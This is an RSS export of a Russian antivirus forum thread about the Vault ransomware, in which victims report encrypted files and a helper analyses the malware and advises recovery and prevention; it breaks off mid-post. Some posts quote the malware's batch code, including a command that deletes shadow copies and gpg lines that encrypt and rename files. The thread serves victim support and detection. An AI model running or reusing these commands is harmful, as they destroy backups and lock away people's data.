<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: файлы зашифрованы с расширением .vault]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме файлы зашифрованы с расширением .vault форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Wed, 22 Apr 2026 05:04:44 +0300</pubDate>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message89387/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Ильдар, когда было шифрование по дате? <br />
			<i>19.11.2015 19:41:10, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message89387/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message89387/</guid>
			<pubDate>Thu, 19 Nov 2015 19:41:10 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message89386/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			На мой компьютер проник вирус (баннер) и испортил все текстовые документы, переведя их в формат Vault <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=97233&" width="807" height="605" /><br /><img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=97234&" width="807" height="605" /><br /><i>19.11.2015 18:06:48, Ильдар Арасланов.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message89386/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message89386/</guid>
			<pubDate>Thu, 19 Nov 2015 18:06:48 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message88763/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			вот этот скриптик надо удалять<br /><br />====quote====<br />echo var cdp="%%TEMP%%\\a01dc229.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}&gt;&gt; "%temp%\7c62070c.js"<br /><br />=============<br />тот что выше, похоже, используют как обманку для антивируса. два однотипных скрипта, но только один из них запускает процесс шифрования.<br />а на него как раз - ноль реакции, хотя именно он содержит ссылку на командный файл a01dc229.cmd, в котором собраны все команды шифрования файлов. после обхода дисков и очистки от лишних строк.<br /><br />вот с этим содержимым и надо ловить файл, здесь инфы предостаточно, чтобы отловить его.<br /><br />====quote====<br />chcp 866 <br />"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& move /y "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls.gpg" "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& rename "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls" "15092014 16_55_03.xls.vault"<br />"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& move /y "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls.gpg" "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& rename "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls" "32 ремонтный завод .xls.vault"<br /><br />=============<br /> <br />
			<i>28.10.2015 15:17:02, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message88763/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message88763/</guid>
			<pubDate>Wed, 28 Oct 2015 15:17:02 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message88762/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Это меня и удивило - антивирус его в принципе распознает, но не распознал в момент запуска/создания/работы, да и шифрование процесс не такой быстрый. &nbsp; <br />
			<i>28.10.2015 15:16:40, Станислав Перевозников.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message88762/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message88762/</guid>
			<pubDate>Wed, 28 Oct 2015 15:16:40 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message88761/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			27.10.2015 11:15:29	Защита в режиме реального времени	файл	C:\Users\23\AppData\Local\Temp\27ddf88e.js	BAT/Filecoder.AG троянская программа	очищен удалением - изолирован	23-ПК\23	Событие произошло в новом файле, созданном следующим приложением: C:\Windows\System32\cmd.exe.<br /><br /><br />====quote====<br />echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');&gt; "%temp%\27ddf88e.js"<br /><br />=============<br /><br />этот скриптик, скорее всего уже после запуска был удален. здесь удаление файла не повлияло на процесс шифрования. <br />
			<i>28.10.2015 15:10:09, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message88761/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message88761/</guid>
			<pubDate>Wed, 28 Oct 2015 15:10:09 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message88760/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_7JYXwPT1" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />Станислав, <br />если не трудно, добавьте &nbsp;<noindex><a href="http://forum.esetnod32.ru/forum9/topic1408/" target="_blank" rel="nofollow">лог журнала обнаружения угроз.</a></noindex> <br />судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились<br />=============<br /><br />Но, частично он их испортил - тк в свойствах документа версий не было, только через прогу нашлись. <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=97135">esset_export.txt</a><br /><i>28.10.2015 14:56:14, Станислав Перевозников.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message88760/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message88760/</guid>
			<pubDate>Wed, 28 Oct 2015 14:56:14 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message88759/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Станислав, <br />если не трудно, добавьте <noindex><a href="http://forum.esetnod32.ru/forum9/topic1408/" target="_blank" rel="nofollow">лог журнала обнаружения угроз.</a></noindex><br />судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились<br /><br />судя по коду шифратора так и есть.<br />
====code====
<pre>echo Set objShell = CreateObject^("Shell.Application"^) &#62; "%temp%&#92;59665d79.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) &#62;&#62; "%temp%&#92;59665d79.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) &#62;&#62; "%temp%&#92;59665d79.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 &#62;&#62; "%temp%&#92;59665d79.vbs"</pre>
============= <br />
			<i>28.10.2015 14:50:33, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message88759/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message88759/</guid>
			<pubDate>Wed, 28 Oct 2015 14:50:33 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message88754/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Добрый день!<br />На работе словли эту напасть. Обидно, что за два дня до этого активировали купленную лицензию на SMART SECURITY, в замен Каспера (который, если верить сети, эту гадость ловит:(). Маил письмо пропустил, хотя попытку переслать это письмо мне пресек. Антивирус тоже сфилонил.<br /><br />Шифратор отработал, ключ потер. Но теневые копии нашлись через ShadowExplorer (хотя в свойствах файлов Предыдущих версий уже не было) - спасибо Вам за наводку.<br /><br />Посмотрел отчет, как отработал Esset (скрин прилагаю) - отловил KillBackup, Filecoder, Runner.BC (ну, хоть за это большое спасибо ему). Хотя непонятно, он его отловил, но как-то частично - более 15 000 документов и картинок зашифровано, ключ потерт. Фото тер по непонятному принципу - т.е. потер, но не все. &nbsp; <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=97134&" width="1366" height="768" /><br /><i>28.10.2015 13:54:09, Станислав Перевозников.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message88754/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message88754/</guid>
			<pubDate>Wed, 28 Oct 2015 13:54:09 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87549/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Константин Гончаров,<br />ответил в почту. <br />опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо &nbsp;перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами. <br />
			<i>01.09.2015 05:35:30, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87549/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87549/</guid>
			<pubDate>Tue, 01 Sep 2015 05:35:30 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87531/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Добрый день! К сожалению, столкнулся с такой же незадачей: сотрудница запустила вирус на своей машине и &quot;зашифровала&quot;, естественно крайне важную и необходимую, информацию. По дате отобрал файлы, какие смог найти на компьютере. Отправил на почту santy, указанную выше. Буду очень признателен, если найдется время проверить архив и возможность восстановления информации. Заранее спасибо! <br />
			<i>31.08.2015 15:50:24, Константин Гончаров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87531/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87531/</guid>
			<pubDate>Mon, 31 Aug 2015 15:50:24 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87413/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<a class="blog-p-user-name" id="bp_9war7lv1" href="/user/21741/" bx-tooltip-user-id="21741">Виктор</a>, поздравляю, зачастую, точки восстановления тоже затираются, так что Вам повезло &nbsp; <img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_smile.gif" border="0" data-code=":)" data-definition="SD" alt=":)" style="width:16px;height:16px;" title="С улыбкой" class="bx-smile" /> <br />
			<i>25.08.2015 12:56:43, Валентин.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87413/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87413/</guid>
			<pubDate>Tue, 25 Aug 2015 12:56:43 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87409/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Доброй ночи!<br /><br />Схватил VAULT 21.08.15г &nbsp;с письмом на mail.с архивом ZIP ,типо с счетом . испробовал все!! &nbsp;В итоге воспользовался &nbsp;восстановкой потерянных данных :Компьютер- Рабочий Стол- папка с доками- восстаовить прежнюю версию. &nbsp;Воссстановилось все! &nbsp;Все работает . Дублирующие файлы формата VAULT &nbsp;отсортировал по типу и удалил. <br />
			<i>24.08.2015 23:06:24, Виктор Соколин.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87409/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87409/</guid>
			<pubDate>Mon, 24 Aug 2015 23:06:24 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87407/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			по мотивам беседы с Оксаной.<br /><br /><B>Ищут пожарные, ищет милиция...Ищут давно, Но не могут найти..." (с), С.Маршак.</B><br /><br />Очередная активность вулкана по имени ВАУЛТ вновь накрыла своей электронной волной беспечных пользователей, которые уютно устроились у монитора, принимая извергаемый сетевой "пепел" за манну небесную.<br /><br />восстановить утраченные в результате внезапной атаки (а так же отсутствия архивных и теневых копий) файлы крайне сложно, во-первых, в силу их шифрования, во-вторых, тщательной зачистки оригинальных документов после удаления.<br /><br />для проверки возможности восстановления удаленных документов после завершения процесса шифрования использовались несколько инструментов:<br /><br /><B><noindex><a href="https://www.runtime.org/data-recovery-software.htm" target="_blank" rel="nofollow">getdataback</a></noindex>,<br /><noindex><a href="http://www.r-studio.com/ru/" target="_blank" rel="nofollow">r-studio,</a></noindex><br /><noindex><a href="http://www.krollontrack.com/data-recovery/recovery-software/" target="_blank" rel="nofollow">ontrack easy recovery,</a></noindex><br /><noindex><a href="http://hetmanrecovery.com/ru/hard_drive_recovery/software-3.htm" target="_blank" rel="nofollow">hetman partition recovery,</a></noindex><br /><noindex><a href="http://www.cgsecurity.org/wiki/TestDisk" target="_blank" rel="nofollow">testdisk,</a></noindex><br /><noindex><a href="http://www.x-ways.net/winhex/" target="_blank" rel="nofollow">winhex</a></noindex></B><br /><br />для теста использовались несколько папок с документами:<br />doc, xls, pdf, jpg, rtf, txt, rar<br /><br />не ставил цели сравнить данные инструменты, кто лучше, быстрее и больше восстановит документов.<br />надо было просто посмотреть что подобные инструменты могут что-то восстановить после целенаправленного шифрования и удаления документов.<br />В случае с ВАУЛТОМ цель не достигнута. документов восстановлено минимальное количество, а след секретного ключа (secring.gpg) не найден.<br /><br />поиски в winhex по известным hex (9501D804558F43D6010400BA49F79C06, 9501D804558F3209010400BE8B3CB164, 9501D80455A4EE32010400B53F95F674), и символьным (-----BEGIN PGP PRIVATE KEY BLOCK-----,-----END PGP PRIVATE KEY BLOCK-----) сигнатурам не дали результат.<br /><br />отсюда вывод: надежда на восстановление документов специализированными инструментами крайне мала, после того как "их санкции порвали в клочья нашу экономику"<br /><br />отсюда другая надежда: на превентивную защиту от запуска шифраторов. например, <noindex><a href="https://www.foolishit.com/cryptoprevent-malware-prevention/" target="_blank" rel="nofollow"><B>Cryptoprevent,</B></a></noindex> а так же на создание защищенных разделов для документов с помощью HIPS.<br /><br />(с), chklst.ru <br />
			<i>24.08.2015 17:10:01, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87407/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87407/</guid>
			<pubDate>Mon, 24 Aug 2015 17:10:01 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87380/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_wzPkIbRG" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />pubring.gpg обычно не перезаписывается мусором, и не удаляется.<br />а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором.<br />=============<br />Ладно, пойду узнаю сколько стоит это все восстановить.... <br />
			<i>21.08.2015 17:15:09, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87380/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87380/</guid>
			<pubDate>Fri, 21 Aug 2015 17:15:09 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87379/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			pubring.gpg обычно не перезаписывается мусором, и не удаляется.<br />а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором. <br />
			<i>21.08.2015 17:11:17, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87379/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87379/</guid>
			<pubDate>Fri, 21 Aug 2015 17:11:17 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87378/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Итак: &nbsp;trustdb.gpg - 1 кб состояние Утрачен, pubring. gpg - 341 кб состояние Отличное, три файла secring.gpg.lock - 0 кб &nbsp;состояние Утрачен <br />
			<i>21.08.2015 17:09:36, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87378/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87378/</guid>
			<pubDate>Fri, 21 Aug 2015 17:09:36 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87377/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			ну, в случае с VAULT выход определенный есть, идти на поклон к злодеям с мешком денег за плечами.<br />это если бизнес которые есть перевесит на весах это мешок с деньгами.<br />на это у них и расчет. что файлы слишком дорогие для некоторых людей могут оказаться.<br />----------<br />в плане политик... хотя бы самые простые добавить... ограничить (через локальные политики) запуск исполняемых файлов из архивов. <br />
			<i>21.08.2015 17:02:03, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87377/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87377/</guid>
			<pubDate>Fri, 21 Aug 2015 17:02:03 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87376/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_Xps8X5Eo" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />надо просто вырасти на порядок - два в знании мер безопасной работы в сети.<br />а это знание и использование и инструментов защиты, и методов соц.инженерии и актуальных угроз из сети.<br />это поможет.<br /> правило - поставил антивирус и забыл - уже не работает. <br />=============<br />так то я в курсе))) У меня все под контролем (комп не мой, удаленно с тем работаю),а вот у некоторых знаний нет, хотя не факт, что они нужны, ведь невозможно все знать, а когда письмо от партнера с темой акт приема-передачи, то вообще перестаешь что-либо подозревать. Вот нет политики в компаниях в плане безопасности информационной это, да, кинут ссыль на автивирус, скачивайте и все будет норм., но я в это давно уже не верю, просто не открываю писем с незнакомыми мне расширениями и прочее. Все нужные файлы на отдельном винчестере, есть архивация... <br /> А потом, &nbsp;человек к сисадмину бежит с темой &quot;Поймал вирус&quot;, сисадмин грит &quot;Снесем винду и все будет норм&quot;, то даже мне домохозяйке с курсами кройки и шитья, и в прошлом работа в логистике, кажется странным. Причем я никак не критикую сисадминов, у меня есть хорошие знакомые сисадмины и мне их жаль ибо пользователи бывают разные, типа &quot;Сначала компьютер включи&quot;. Итог: человек работал 3 года за ноутом, весь бизнес в нем и со всем этим придется попрощаться (удаленные файлы в поиске еще и не факт, что найдется). &nbsp; <br />
			<i>21.08.2015 16:39:21, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87376/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87376/</guid>
			<pubDate>Fri, 21 Aug 2015 16:39:21 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87375/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			надо просто вырасти на порядок - два в знании мер безопасной работы в сети.<br />а это знание и использование и инструментов защиты, и методов соц.инженерии и актуальных угроз из сети.<br />это поможет.<br /><B>правило - поставил антивирус и забыл - уже не работает.</B> <br />
			<i>21.08.2015 16:33:22, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87375/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87375/</guid>
			<pubDate>Fri, 21 Aug 2015 16:33:22 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87374/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_7MMRIRx3" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />Оксана, <br />эта история из разряда, бодался теленок со стойкой криптографией. <br />здесь и квалификация не поможет, только секретный ключ, на изготовление которого по известному pubring.gpg понадобятся сотни лет.<br />=============<br />Отличная аналогия)))))) я то все думаю как себя назвать))))))) &nbsp; <br />
			<i>21.08.2015 16:26:29, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87374/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87374/</guid>
			<pubDate>Fri, 21 Aug 2015 16:26:29 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87373/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			Оксана, <br />эта история из разряда, бодался теленок со стойкой криптографией. <img src="http://forum.esetnod32.ru/upload/main/smiles/5/icon_smile.gif" border="0" data-code=":)" data-definition="SD" alt=":)" style="width:16px;height:16px;" title="С улыбкой" class="bx-smile" /><br />здесь и квалификация не поможет, только секретный ключ, на изготовление которого по известному pubring.gpg понадобятся сотни машинных лет.<br />----------<br />т.е. здесь надо искать не противоядие... уже поздно, а реализовать надежные меры по защите, <br />чтобы не повторилось все сначала. <br />
			<i>21.08.2015 16:24:29, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87373/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87373/</guid>
			<pubDate>Fri, 21 Aug 2015 16:24:29 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87372/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_AdTkuU7v" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />вообще чудеса с ВАУЛТом случаются, хотя и редко. <br />впервые я столкнулся с ним год назад (тогда это был не VAULT, &nbsp; &nbsp;а бат.энкодер &nbsp; , но с таким же принципом работы и методом шифрования), когда необходимо было восстановить множество зашифрованных файлов на локальном и сетевых дисках.<br />тогда расширения файлов были doc.gpg. xls.gpg.<br />оказалось, что файлы не были зашифрованы, а всего лишь переименованы, при том, что private.key и unique.key были зашифрованы по настоящему.<br /><br />но больше так не везло уже. <br />=============<br />Для меня это все перешло в переквалификацию и спортивный интерес)))) Я пережила все деструктивные чувства))), теперь я в амебном состоянии сижу и что-то делаю))) Если есть яд, то есть и противоядие, хотя на Луну придумали как летать, а как бороться с такими вирусами, нет <br />
			<i>21.08.2015 16:14:12, Оксана Дубовицкая.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum35/topic13305/message87372/</link>
			<guid>http://forum.esetnod32.ru/messages/forum35/topic13305/message87372/</guid>
			<pubDate>Fri, 21 Aug 2015 16:14:12 +0300</pubDate>
			<category>Шифровальщики файлов и подбор дешифраторов</category>
		</item>
		<item>
			<title>файлы зашифрованы с расширением .vault</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum35/topic13305/message87370/">файлы зашифрованы с расширением .vault</a></b> <i>bat encoder /CryptVault</i> в форуме <a href="http://forum.esetnod32.ru/forum35/">Шифровальщики файлов и подбор дешифраторов</a>. <br />
